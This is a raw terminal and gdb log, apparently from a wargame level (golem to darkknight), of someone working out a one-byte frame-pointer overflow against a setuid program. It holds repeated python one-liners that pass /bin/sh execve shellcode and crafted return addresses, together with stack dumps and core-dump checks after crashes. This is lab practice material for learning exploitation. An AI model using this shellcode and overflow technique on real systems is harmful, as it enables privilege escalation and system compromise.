golem / cup of coffee

fakeEBP 4바이트|fakeEIP 4바이트| NOP 7바이트 |쉘코드25바이트|주소1바이트 //41바이트

bf ff fc 68


`python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\xac"'`

`python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`



Undefined command: "".  Try "help".
(gdb) x/40 $esp
0xbffffad8:	0xbffffae4	0xbffffc6c	0x00000029	0x90909090
0xbffffae8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb08:	0x90909090	0xbffffb91	0x0804849e	0xbffffc6c
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048390
0xbffffb38:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc56
0xbffffb68:	0xbffffc6c	0x00000000	0xbffffc96	0xbffffcb8
(gdb) 
0xbffffb78:	0xbffffcc2	0xbffffcd0	0xbffffcef	0xbffffcfd
0xbffffb88:	0xbffffd16	0xbffffd31	0xbffffd3c	0xbffffd4a
0xbffffb98:	0xbffffd8b	0xbffffd9c	0xbffffdb1	0xbffffdc1
0xbffffba8:	0xbffffdcc	0xbffffde9	0xbffffe03	0xbffffe0e
0xbffffbb8:	0xbffffe1b	0xbffffe23	0x00000000	0x00000003
0xbffffbc8:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffbd8:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffffbe8:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffffbf8:	0x08048390	0x0000000b	0x000001ff	0x0000000c
0xbffffc08:	0x000001ff	0x0000000d	0x000001ff	0x0000000e
(gdb) 
0xbffffc18:	0x000001ff	0x00000010	0x0fabfbff	0x0000000f
0xbffffc28:	0xbffffc51	0x00000000	0x00000000	0x00000000
0xbffffc38:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc48:	0x00000000	0x00000000	0x38366900	0x682f0036
0xbffffc58:	0x2f656d6f	0x656c6f67	0x61642f6d	0x696e6b63
0xbffffc68:	0x00746867	0x90909090	0x90909090	0x90909090
0xbffffc78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc88:	0x90909090	0x90909090	0x90909090	0x454c0091
0xbffffc98:	0x504f5353	0x7c3d4e45	0x7273752f	0x6e69622f
0xbffffca8:	0x73656c2f	0x70697073	0x68732e65	0x00732520
(gdb) info reg
eax            0xbffffae4	-1073743132
ecx            0xbffffb0c	-1073743092
edx            0xbffffc95	-1073742699
ebx            0x401081ec	1074823660
esp            0xbffffad8	-1073743144



bffffb64





====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
====================================================================================
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc56
0xbffffb68:	0xbffffc6c	0x00000000	0xbffffc96	0xbffffcb8
(gdb) 
0xbffffb78:	0xbffffcc2	0xbffffcd0	0xbffffcef	0xbffffcfd
0xbffffb88:	0xbffffd16	0xbffffd31	0xbffffd3c	0xbffffd4a
0xbffffb98:	0xbffffd8b	0xbffffd9c	0xbffffdb1	0xbffffdc1
0xbffffba8:	0xbffffdcc	0xbffffde9	0xbffffe03	0xbffffe0e
0xbffffbb8:	0xbffffe1b	0xbffffe23	0x00000000	0x00000003
0xbffffbc8:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffbd8:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffffbe8:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffffbf8:	0x08048390	0x0000000b	0x000001ff	0x0000000c
0xbffffc08:	0x000001ff	0x0000000d	0x000001ff	0x0000000e
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) b^Hy
Please answer y or n.
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/golem/dacknight `python -c 'print "\x90"*40+"\x91"'`

Breakpoint 1, 0x8048455 in problem_child ()
(gdb) r `python -c 'print "\x90"*40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/golem/dacknight `python -c 'print "\x90"*40'`

Breakpoint 1, 0x8048455 in problem_child ()
(gdb) x/40 $esp
0xbffffad8:	0xbffffae4	0xbffffc6d	0x00000029	0x90909090
0xbffffae8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb08:	0x90909090	0xbffffb00	0x0804849e	0xbffffc6d
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048390
0xbffffb38:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc57
0xbffffb68:	0xbffffc6d	0x00000000	0xbffffc96	0xbffffcb8
(gdb) q
The program is running.  Exit anyway? (y or n) ^H^H^Hn
Please answer y or n.
The program is running.  Exit anyway? (y or n) n
Not confirmed.
(gdb) b *problem_child+16
Breakpoint 2 at 0x8048450
(gdb) r `python -c 'print "\x90"*40+"\x91"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/golem/dacknight `python -c 'print "\x90"*40+"\x91"'`

Breakpoint 2, 0x8048450 in problem_child ()
(gdb) x/40 $esp
0xbffffad8:	0xbffffae4	0xbffffc6c	0x00000029	0x0804953c
0xbffffae8:	0x08048257	0x40021ca0	0xbffffb18	0x4000a970
0xbffffaf8:	0x400f855b	0x08049530	0x4000ae60	0xbffffb64
0xbffffb08:	0xbffffb18	0xbffffb18	0x0804849e	0xbffffc6c
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048390
0xbffffb38:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc56
0xbffffb68:	0xbffffc6c	0x00000000	0xbffffc96	0xbffffcb8
(gdb) 여기가 원래의 ebp랑 eip주소가 있는 곳이다.
Undefined command: "꠮  Try "help".
(gdb) ㅇ
Undefined command: "ᠮ  Try "help".
(gdb) d
Delete all breakpoints? (y or n) y
(gdb) b *problem_child+21
Breakpoint 3 at 0x8048455
(gdb) r `python -c 'print "\x90"*40+"\x91"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/golem/dacknight `python -c 'print "\x90"*40+"\x91"'`

Breakpoint 3, 0x8048455 in problem_child ()
(gdb) x/40 $esp
0xbffffad8:	0xbffffae4	0xbffffc6c	0x00000029	0x90909090
0xbffffae8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb08:	0x90909090	0xbffffb91	0x0804849e	0xbffffc6c
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048390
0xbffffb38:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc56
0xbffffb68:	0xbffffc6c	0x00000000	0xbffffc96	0xbffffcb8
(gdb) 
0xbffffb78:	0xbffffcc2	0xbffffcd0	0xbffffcef	0xbffffcfd
0xbffffb88:	0xbffffd16	0xbffffd31	0xbffffd3c	0xbffffd4a
0xbffffb98:	0xbffffd8b	0xbffffd9c	0xbffffdb1	0xbffffdc1
0xbffffba8:	0xbffffdcc	0xbffffde9	0xbffffe03	0xbffffe0e
0xbffffbb8:	0xbffffe1b	0xbffffe23	0x00000000	0x00000003
0xbffffbc8:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffbd8:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffffbe8:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffffbf8:	0x08048390	0x0000000b	0x000001ff	0x0000000c
0xbffffc08:	0x000001ff	0x0000000d	0x000001ff	0x0000000e
(gdb) 
0xbffffc18:	0x000001ff	0x00000010	0x0fabfbff	0x0000000f
0xbffffc28:	0xbffffc51	0x00000000	0x00000000	0x00000000
0xbffffc38:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc48:	0x00000000	0x00000000	0x38366900	0x682f0036
0xbffffc58:	0x2f656d6f	0x656c6f67	0x61642f6d	0x696e6b63
0xbffffc68:	0x00746867	0x90909090	0x90909090	0x90909090
0xbffffc78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc88:	0x90909090	0x90909090	0x90909090	0x454c0091
0xbffffc98:	0x504f5353	0x7c3d4e45	0x7273752f	0x6e69622f
0xbffffca8:	0x73656c2f	0x70697073	0x68732e65	0x00732520
(gdb) x 0x400309cb
0x400309cb <__libc_start_main+255>:	0xf863e850
(gdb) x 0xf863e850
0xf863e850:	Cannot access memory at address 0xf863e850
(gdb) x/40 $esp
0xbffffad8:	0xbffffae4	0xbffffc6c	0x00000029	0x90909090
0xbffffae8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb08:	0x90909090	0xbffffb91	0x0804849e	0xbffffc6c
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048390
0xbffffb38:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc56
0xbffffb68:	0xbffffc6c	0x00000000	0xbffffc96	0xbffffcb8
(gdb) 
0xbffffb78:	0xbffffcc2	0xbffffcd0	0xbffffcef	0xbffffcfd
0xbffffb88:	0xbffffd16	0xbffffd31	0xbffffd3c	0xbffffd4a
0xbffffb98:	0xbffffd8b	0xbffffd9c	0xbffffdb1	0xbffffdc1
0xbffffba8:	0xbffffdcc	0xbffffde9	0xbffffe03	0xbffffe0e
0xbffffbb8:	0xbffffe1b	0xbffffe23	0x00000000	0x00000003
0xbffffbc8:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffbd8:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffffbe8:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffffbf8:	0x08048390	0x0000000b	0x000001ff	0x0000000c
0xbffffc08:	0x000001ff	0x0000000d	0x000001ff	0x0000000e
(gdb) 
0xbffffc18:	0x000001ff	0x00000010	0x0fabfbff	0x0000000f
0xbffffc28:	0xbffffc51	0x00000000	0x00000000	0x00000000
0xbffffc38:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc48:	0x00000000	0x00000000	0x38366900	0x682f0036
0xbffffc58:	0x2f656d6f	0x656c6f67	0x61642f6d	0x696e6b63
0xbffffc68:	0x00746867	0x90909090	0x90909090	0x90909090
0xbffffc78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc88:	0x90909090	0x90909090	0x90909090	0x454c0091
0xbffffc98:	0x504f5353	0x7c3d4e45	0x7273752f	0x6e69622f
0xbffffca8:	0x73656c2f	0x70697073	0x68732e65	0x00732520
(gdb) 
0xbffffcb8:	0x52455355	0x454d414e	0x4948003d	0x49535453
0xbffffcc8:	0x313d455a	0x00303030	0x54534f48	0x454d414e
0xbffffcd8:	0x636f6c3d	0x6f686c61	0x6c2e7473	0x6c61636f
0xbffffce8:	0x616d6f64	0x4c006e69	0x414e474f	0x673d454d
0xbffffcf8:	0x6d656c6f	0x4d455200	0x4845544f	0x3d54534f
0xbffffd08:	0x2e323931	0x2e383631	0x2e353332	0x414d0031
0xbffffd18:	0x2f3d4c49	0x2f726176	0x6f6f7073	0x616d2f6c
0xbffffd28:	0x672f6c69	0x6d656c6f	0x52455400	0x74783d4d
0xbffffd38:	0x006d7265	0x54534f48	0x45505954	0x3833693d
0xbffffd48:	0x41500036	0x2f3d4854	0x2f727375	0x61636f6c
(gdb) .
Undefined command: "".  Try "help".
(gdb) x/40 $esp
0xbffffad8:	0xbffffae4	0xbffffc6c	0x00000029	0x90909090
0xbffffae8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaf8:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb08:	0x90909090	0xbffffb91	0x0804849e	0xbffffc6c
0xbffffb18:	0xbffffb38	0x400309cb	0x00000002	0xbffffb64
0xbffffb28:	0xbffffb70	0x40013868	0x00000002	0x08048390
0xbffffb38:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb48:	0xbffffb64	0x080482e4	0x080484dc	0x4000ae60
0xbffffb58:	0xbffffb5c	0x40013e90	0x00000002	0xbffffc56
0xbffffb68:	0xbffffc6c	0x00000000	0xbffffc96	0xbffffcb8
(gdb) 
0xbffffb78:	0xbffffcc2	0xbffffcd0	0xbffffcef	0xbffffcfd
0xbffffb88:	0xbffffd16	0xbffffd31	0xbffffd3c	0xbffffd4a
0xbffffb98:	0xbffffd8b	0xbffffd9c	0xbffffdb1	0xbffffdc1
0xbffffba8:	0xbffffdcc	0xbffffde9	0xbffffe03	0xbffffe0e
0xbffffbb8:	0xbffffe1b	0xbffffe23	0x00000000	0x00000003
0xbffffbc8:	0x08048034	0x00000004	0x00000020	0x00000005
0xbffffbd8:	0x00000006	0x00000006	0x00001000	0x00000007
0xbffffbe8:	0x40000000	0x00000008	0x00000000	0x00000009
0xbffffbf8:	0x08048390	0x0000000b	0x000001ff	0x0000000c
0xbffffc08:	0x000001ff	0x0000000d	0x000001ff	0x0000000e
(gdb) 
0xbffffc18:	0x000001ff	0x00000010	0x0fabfbff	0x0000000f
0xbffffc28:	0xbffffc51	0x00000000	0x00000000	0x00000000
0xbffffc38:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc48:	0x00000000	0x00000000	0x38366900	0x682f0036
0xbffffc58:	0x2f656d6f	0x656c6f67	0x61642f6d	0x696e6b63
0xbffffc68:	0x00746867	0x90909090	0x90909090	0x90909090
0xbffffc78:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc88:	0x90909090	0x90909090	0x90909090	0x454c0091
0xbffffc98:	0x504f5353	0x7c3d4e45	0x7273752f	0x6e69622f
0xbffffca8:	0x73656c2f	0x70697073	0x68732e65	0x00732520
(gdb) info reg
eax            0xbffffae4	-1073743132
ecx            0xbffffb0c	-1073743092
edx            0xbffffc95	-1073742699
ebx            0x401081ec	1074823660
esp            0xbffffad8	-1073743144
ebp            0xbffffb0c	-1073743092
esi            0x4000ae60	1073786464
edi            0xbffffb64	-1073743004
eip            0x8048455	134513749
eflags         0x246	582
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x0	0
cwd            0xffff037f	-64641
swd            0xffff0000	-65536
twd            0x0	0
fip            0x401e0178	1075708280
fcs            0x0	0
fopo           0x0	0
fos            0x0	0
(gdb) x 08048034
Invalid number "08048034".
(gdb) x \x08048034
Invalid character '\' in expression.
(gdb) x 0x08048034
0x8048034:	0x00000006
(gdb) r `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/golem/dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Breakpoint 3, 0x8048455 in problem_child ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿D
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
argv error
[golem@localhost golem]$ ./dacknight `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xff\xff\xff\xbf"+"\xff\xfb\xff\xbf"+"\x90"*7+"\x64"'`
¿
Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./dacknight ¿'.
Program terminated with signal 11, Segmentation fault.
#0  0xbf in ?? ()
(gdb) info reg
eax            0x2	2
ecx            0x400	1024
edx            0x40106980	1074817408
ebx            0x401081ec	1074823660
esp            0xbffffb08	-1073743096
ebp            0xbffffb04	-1073743100
esi            0x4000ae60	1073786464
edi            0xbffffb84	-1073742972
eip            0xbf	191
eflags         0x10282	66178
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x2b	43
gs             0x2b	43
cwd            0x0	0
swd            0x0	0
twd            0x0	0
fip            0x0	0
fcs            0x0	0
fopo           0x0	0
fos            0x0	0
(gdb) x/40 $esp
0xbffffb08:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb18:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffb28:	0x00000000	0xbffffb00	0x0804849e	0xbffffc90
0xbffffb38:	0xbffffb58	0x400309cb	0x00000002	0xbffffb84
0xbffffb48:	0xbffffb90	0x40013868	0x00000002	0x08048390
0xbffffb58:	0x00000000	0x080483b1	0x0804846c	0x00000002
0xbffffb68:	0xbffffb84	0x080482e4	0x080484dc	0x4000ae60
0xbffffb78:	0xbffffb7c	0x40013e90	0x00000002	0xbffffc84
0xbffffb88:	0xbffffc90	0x00000000	0xbffffc92	0xbffffcb4
0xbffffb98:	0xbffffcbe	0xbffffccc	0xbffffceb	0xbffffcf9
(gdb) 
0xbffffba8:	0xbffffd12	0xbffffd2d	0xbffffd38	0xbffffd46
0xbffffbb8:	0xbffffd87	0xbffffd98	0xbffffdad	0xbffffdbd
0xbffffbc8:	0xbffffdc8	0xbffffde5	0xbffffdff	0xbffffe0a
0xbffffbd8:	0xbffffe17	0xbffffe1f	0xbfffffe2	0x00000000
0xbffffbe8:	0x00000003	0x08048034	0x00000004	0x00000020
0xbffffbf8:	0x00000005	0x00000006	0x00000006	0x00001000
0xbffffc08:	0x00000007	0x40000000	0x00000008	0x00000000
0xbffffc18:	0x00000009	0x08048390	0x0000000b	0x000001ff
0xbffffc28:	0x0000000c	0x000001ff	0x0000000d	0x000001ff
0xbffffc38:	0x0000000e	0x000001ff	0x00000010	0x0fabfbff
(gdb) 
0xbffffc48:	0x0000000f	0xbffffc7f	0x00000000	0x00000000
0xbffffc58:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc68:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc78:	0x00000000	0x69000000	0x00363836	0x61642f2e
0xbffffc88:	0x696e6b63	0x00746867	0x454c00bf	0x504f5353
0xbffffc98:	0x7c3d4e45	0x7273752f	0x6e69622f	0x73656c2f
0xbffffca8:	0x70697073	0x68732e65	0x00732520	0x52455355
0xbffffcb8:	0x454d414e	0x4948003d	0x49535453	0x313d455a
0xbffffcc8:	0x00303030	0x54534f48	0x454d414e	0x636f6c3d
0xbffffcd8:	0x6f686c61	0x6c2e7473	0x6c61636f	0x616d6f64
(gdb) 
0xbffffce8:	0x4c006e69	0x414e474f	0x673d454d	0x6d656c6f
0xbffffcf8:	0x4d455200	0x4845544f	0x3d54534f	0x2e323931
0xbffffd08:	0x2e383631	0x2e353332	0x414d0031	0x2f3d4c49
0xbffffd18:	0x2f726176	0x6f6f7073	0x616d2f6c	0x672f6c69
0xbffffd28:	0x6d656c6f	0x52455400	0x74783d4d	0x006d7265
0xbffffd38:	0x54534f48	0x45505954	0x3833693d	0x41500036
0xbffffd48:	0x2f3d4854	0x2f727375	0x61636f6c	0x69622f6c
0xbffffd58:	0x622f3a6e	0x2f3a6e69	0x2f727375	0x3a6e6962
0xbffffd68:	0x7273752f	0x3131582f	0x622f3652	0x2f3a6e69
0xbffffd78:	0x656d6f68	0x6c6f672f	0x622f6d65	0x48006e69
(gdb) 
0xbffffd88:	0x3d454d4f	0x6d6f682f	0x6f672f65	0x006d656c
0xbffffd98:	0x55504e49	0x3d435254	0x6374652f	0x706e692f
0xbffffda8:	0x63727475	0x45485300	0x2f3d4c4c	0x2f6e6962
0xbffffdb8:	0x68736162	0x45535500	0x6f673d52	0x006d656c
0xbffffdc8:	0x48534142	0x564e455f	0x6f682f3d	0x672f656d
0xbffffdd8:	0x6d656c6f	0x61622e2f	0x63726873	0x53494400
0xbffffde8:	0x59414c50	0x3239313d	0x3836312e	0x3533322e
0xbffffdf8:	0x303a312e	0x4c00302e	0x3d474e41	0x555f6e65
0xbffffe08:	0x534f0053	0x45505954	0x6e694c3d	0x53007875
0xbffffe18:	0x4c564c48	0x4c00313d	0x4f435f53	0x53524f4c
(gdb) 
0xbffffe28:	0x3d6f6e3d	0x663a3030	0x30303d69	0x3d69643a
0xbffffe38:	0x333b3130	0x6e6c3a34	0x3b31303d	0x703a3633
0xbffffe48:	0x30343d69	0x3a33333b	0x303d6f73	0x35333b31
0xbffffe58:	0x3d64623a	0x333b3034	0x31303b33	0x3d64633a
0xbffffe68:	0x333b3034	0x31303b33	0x3d726f3a	0x303b3130
0xbffffe78:	0x37333b35	0x3a31343b	0x303d696d	0x35303b31
0xbffffe88:	0x3b37333b	0x653a3134	0x31303d78	0x3a32333b
0xbffffe98:	0x6d632e2a	0x31303d64	0x3a32333b	0x78652e2a
0xbffffea8:	0x31303d65	0x3a32333b	0x6f632e2a	0x31303d6d
0xbffffeb8:	0x3a32333b	0x74622e2a	0x31303d6d	0x3a32333b
(gdb) 
0xbffffec8:	0x61622e2a	0x31303d74	0x3a32333b	0x68732e2a
0xbffffed8:	0x3b31303d	0x2a3a3233	0x6873632e	0x3b31303d
0xbffffee8:	0x2a3a3233	0x7261742e	0x3b31303d	0x2a3a3133
0xbffffef8:	0x7a67742e	0x3b31303d	0x2a3a3133	0x6a72612e
0xbfffff08:	0x3b31303d	0x2a3a3133	0x7a61742e	0x3b31303d
0xbfffff18:	0x2a3a3133	0x687a6c2e	0x3b31303d	0x2a3a3133
0xbfffff28:	0x70697a2e	0x3b31303d	0x2a3a3133	0x303d7a2e
0xbfffff38:	0x31333b31	0x5a2e2a3a	0x3b31303d	0x2a3a3133
0xbfffff48:	0x3d7a672e	0x333b3130	0x2e2a3a31	0x3d327a62
0xbfffff58:	0x333b3130	0x2e2a3a31	0x303d7a62	0x31333b31
(gdb) 
0xbfffff68:	0x742e2a3a	0x31303d7a	0x3a31333b	0x70722e2a
0xbfffff78:	0x31303d6d	0x3a31333b	0x70632e2a	0x303d6f69
0xbfffff88:	0x31333b31	0x6a2e2a3a	0x303d6770	0x35333b31
0xbfffff98:	0x672e2a3a	0x303d6669	0x35333b31	0x622e2a3a
0xbfffffa8:	0x303d706d	0x35333b31	0x782e2a3a	0x303d6d62
0xbfffffb8:	0x35333b31	0x782e2a3a	0x303d6d70	0x35333b31
0xbfffffc8:	0x702e2a3a	0x303d676e	0x35333b31	0x742e2a3a
0xbfffffd8:	0x303d6669	0x35333b31	0x3d5f003a	0x61642f2e
0xbfffffe8:	0x696e6b63	0x00746867	0x61642f2e	0x696e6b63
0xbffffff8:	0x00746867	0x00000000	Cannot access memory at address 0xc0000000
(gdb) 
0xc0000004:	Cannot access memory at address 0xc0000004
(gdb) q
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\x91"'`

Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\x91"'`
¿d
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\x91"'`
h鼿¿	@ 
Segmentation fault (core dumped)
[golem@localhost golem]$ ./dacknight `python -c 'print "\x90"*40+"\x91"'`
h鼿¿	@ 
Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./dacknight '.
Program terminated with signal 11, Segmentation fault.
#0  0x87bffffd in ?? ()
(gdb) x/40 $esp
0xbffffb99:	0x98bffffd	0xadbffffd	0xbdbffffd	0xc8bffffd
0xbffffba9:	0xe5bffffd	0xffbffffd	0x0abffffd	0x17bffffe
0xbffffbb9:	0x1fbffffe	0xe2bffffe	0x00bfffff	0x03000000
0xbffffbc9:	0x34000000	0x04080480	0x20000000	0x05000000
0xbffffbd9:	0x06000000	0x06000000	0x00000000	0x07000010
0xbffffbe9:	0x00000000	0x08400000	0x00000000	0x09000000
0xbffffbf9:	0x90000000	0x0b080483	0xff000000	0x0c000001
0xbffffc09:	0xff000000	0x0d000001	0xff000000	0x0e000001
0xbffffc19:	0xff000000	0x10000001	0xff000000	0x0f0fabfb
0xbffffc29:	0x57000000	0x00bffffc	0x00000000	0x00000000
(gdb) 
0xbffffc39:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffc49:	0x00000000	0x00000000	0x00000000	0x36690000
0xbffffc59:	0x2e003638	0x6361642f	0x67696e6b	0x90007468
0xbffffc69:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc79:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffc89:	0x90909090	0x91909090	0x53454c00	0x45504f53
0xbffffc99:	0x2f7c3d4e	0x2f727375	0x2f6e6962	0x7373656c
0xbffffca9:	0x65706970	0x2068732e	0x55007325	0x4e524553
0xbffffcb9:	0x3d454d41	0x53494800	0x5a495354	0x30313d45
0xbffffcc9:	0x48003030	0x4e54534f	0x3d454d41	0x61636f6c
(gdb) 
0xbffffcd9:	0x736f686c	0x6f6c2e74	0x646c6163	0x69616d6f
0xbffffce9:	0x4f4c006e	0x4d414e47	0x6f673d45	0x006d656c
0xbffffcf9:	0x4f4d4552	0x4f484554	0x313d5453	0x312e3239
0xbffffd09:	0x322e3836	0x312e3533	0x49414d00	0x762f3d4c
0xbffffd19:	0x732f7261	0x6c6f6f70	0x69616d2f	0x6f672f6c
0xbffffd29:	0x006d656c	0x4d524554	0x6574783d	0x48006d72
0xbffffd39:	0x5454534f	0x3d455059	0x36383369	0x54415000
0xbffffd49:	0x752f3d48	0x6c2f7273	0x6c61636f	0x6e69622f
0xbffffd59:	0x69622f3a	0x752f3a6e	0x622f7273	0x2f3a6e69
0xbffffd69:	0x2f727375	0x52313158	0x69622f36	0x682f3a6e
(gdb) 
0xbffffd79:	0x2f656d6f	0x656c6f67	0x69622f6d	0x4f48006e
